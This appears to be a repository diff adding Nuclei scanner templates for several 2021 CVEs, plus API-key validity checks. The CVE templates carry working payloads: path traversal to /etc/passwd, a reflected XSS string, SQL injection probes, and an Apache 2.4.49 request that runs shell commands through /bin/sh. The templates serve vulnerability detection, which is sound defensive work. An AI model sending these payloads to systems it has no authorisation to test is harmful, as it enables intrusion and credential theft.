description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
|
||||
tags: wordpress,cve2021,cve,lfi,wp-plugin
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-39316
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-40868
|
||||
|
||||
info:
|
||||
name: Cloudron 6.2 Cross Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
|
||||
tags: cve,cve2021,xss,cloudron
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-40868
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-40960
|
||||
|
||||
info:
|
||||
name: Galera WebTemplate 1.0 – Directory Traversal
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
|
||||
reference:
|
||||
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
|
||||
tags: cve,cve2021,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-40960
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-41648
|
||||
|
||||
info:
|
||||
name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
|
||||
reference: https://github.com/MobiusBinary/CVE-2021-41648
|
||||
tags: cve,cve2021,sqli
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-41648
|
||||
cwe-id: CWE-89
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/action.php"
|
||||
|
||||
body: "proId=1'&addToCart=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Warning: mysqli_num_rows() expects parameter 1 to be"
|
||||
- "xdebug-error xe-warning"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-41649
|
||||
|
||||
info:
|
||||
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
|
||||
reference: https://github.com/MobiusBinary/CVE-2021-41649
|
||||
tags: cve,cve2021,sqli
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-41649
|
||||
cwe-id: CWE-89
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/homeaction.php"
|
||||
body: "cat_id=4'&get_seleted_Category=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Warning: mysqli_num_rows() expects parameter 1 to be"
|
||||
- "xdebug-error xe-warning"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-41773
|
||||
|
||||
info:
|
||||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
name: LFI
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: word
|
||||
name: RCE
|
||||
words:
|
||||
- "CVE-2021-41773-POC"
|
|
@ -0,0 +1,31 @@
|
|||
id: api-abuseipdb
|
||||
|
||||
info:
|
||||
name: AbuseIPDB API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://docs.abuseipdb.com/
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
|
||||
tags: token-spray,abuseipdb
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST https://api.abuseipdb.com/api/v2/report HTTP/1.1
|
||||
Host: api.abuseipdb.com
|
||||
Key: {{token}}
|
||||
Accept: application/json
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 16
|
||||
|
||||
ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root.
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'data":'
|
||||
- 'ipAddress":'
|
||||
condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: api-alienvault
|
||||
|
||||
info:
|
||||
name: AlienVault Open Threat Exchange (OTX) API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://otx.alienvault.com/api
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
|
||||
tags: token-spray,alienvault
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1
|
||||
Host: otx.alienvault.com
|
||||
X-OTX-API-KEY: {{token}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"$schema":'
|
||||
- '"properties":'
|
||||
condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: api-aniapi
|
||||
|
||||
info:
|
||||
name: AniAPI API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://aniapi.com/docs/authentication
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
|
||||
tags: token-spray,aniapi
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.aniapi.com/v1/auth/me"
|
||||
headers:
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"username":'
|
||||
- '"data":'
|
||||
condition: and
|
|
@ -0,0 +1,21 @@
|
|||
id: api-cooperhewitt
|
||||
|
||||
info:
|
||||
name: Cooper Hewitt API
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://collection.cooperhewitt.org/api/methods/
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
|
||||
tags: token-spray,cooperhewitt
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: api-covalent
|
||||
|
||||
info:
|
||||
name: Covalent API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.covalenthq.com/docs/api/
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
|
||||
tags: token-spray,covalent
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"address":'
|
||||
- '"updated_at":'
|
||||
- '"next_update_at":'
|
||||
condition: and
|
|
@ -0,0 +1,21 @@
|
|||
id: api-dribbble
|
||||
|
||||
info:
|
||||
name: Dribbble API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://developer.dribbble.com/v2/
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
|
||||
tags: token-spray,dribbble
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.dribbble.com/v2/user?access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: api-etherscan
|
||||
|
||||
info:
|
||||
name: Etherscan API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://docs.etherscan.io/
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
|
||||
tags: token-spray,etherscan
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'Invalid API Key'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"status":'
|
||||
- '"message":"OK"'
|
||||
condition: and
|
|
@ -0,0 +1,21 @@
|
|||
id: api-europeana
|
||||
|
||||
info:
|
||||
name: Europeana API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://pro.europeana.eu/page/search
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
|
||||
tags: token-spray,europeana
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: api-iconfinder
|
||||
|
||||
info:
|
||||
name: IconFinder API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://developer.iconfinder.com/reference/overview-1
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
|
||||
tags: token-spray,iconfinder
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
|
||||
Host: api.iconfinder.com
|
||||
Accept: application/json
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"icons":'
|
||||
- '"is_icon_glyph":'
|
||||
- '"download_url":'
|
||||
condition: and
|
|
@ -0,0 +1,25 @@
|
|||
id: api-iucn
|
||||
|
||||
info:
|
||||
name: IUCN API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- http://apiv3.iucnredlist.org/api/v3/docs
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
|
||||
tags: token-spray,iucn
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'taxonid'
|
||||
- 'scientific_name'
|
||||
- 'subspecies'
|
||||
condition: and
|
|
@ -0,0 +1,34 @@
|
|||
id: api-micro-user-service
|
||||
|
||||
info:
|
||||
name: Micro User Service API Test
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference:
|
||||
- https://m3o.com/user
|
||||
- https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
|
||||
tags: token-spray,micro-user-service
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST https://api.m3o.com/v1/user/Read HTTP/1.1
|
||||
Host: api.m3o.com
|
||||
Content-Type: application/json
|
||||
Authorization: Bearer {{token}}
|
||||
Content-Length: 21
|
||||
|
||||
{
|
||||
"id": "usrid-1"
|
||||
}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"username":'
|
||||
- '"email":'
|
||||
- '"created":'
|
||||
- '"updated":'
|
||||
condition: and
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue